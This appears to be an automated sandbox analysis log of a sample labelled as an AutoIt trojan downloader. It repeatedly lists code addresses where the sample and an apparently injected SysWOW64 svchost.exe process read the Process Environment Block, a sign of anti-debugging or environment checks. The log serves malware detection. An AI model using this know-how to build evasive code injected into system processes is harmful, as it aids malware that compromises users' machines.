            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_01103540 mov eax, dword ptr fs:[00000030h] 0_2_01103540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_011034E0 mov eax, dword ptr fs:[00000030h] 0_2_011034E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe Code function: 0_2_01101E70 mov eax, dword ptr fs:[00000030h] 0_2_01101E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h] 1_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h] 1_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h] 1_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h] 1_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h] 1_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h] 1_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h] 1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h] 1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h] 1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h] 1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h] 1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h] 1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h] 1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03908324 mov eax, dword ptr fs:[00000030h] 1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h] 1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h] 1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h] 1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h] 1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390634F mov eax, dword ptr fs:[00000030h] 1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h] 1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h] 1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h] 1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h] 1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h] 1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h] 1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h] 1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h] 1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h] 1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390625D mov eax, dword ptr fs:[00000030h] 1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h] 1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h] 1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h] 1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h] 1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h] 1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h] 1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h] 1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h] 1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h] 1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h] 1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h] 1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h] 1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h] 1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h] 1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h] 1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h] 1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h] 1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383208A mov eax, dword ptr fs:[00000030h] 1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h] 1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h] 1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h] 1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h] 1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h] 1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h] 1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h] 1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h] 1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h] 1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h] 1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h] 1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832050 mov eax, dword ptr fs:[00000030h] 1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h] 1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h] 1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D678E mov eax, dword ptr fs:[00000030h] 1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038307AF mov eax, dword ptr fs:[00000030h] 1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h] 1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h] 1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h] 1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h] 1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
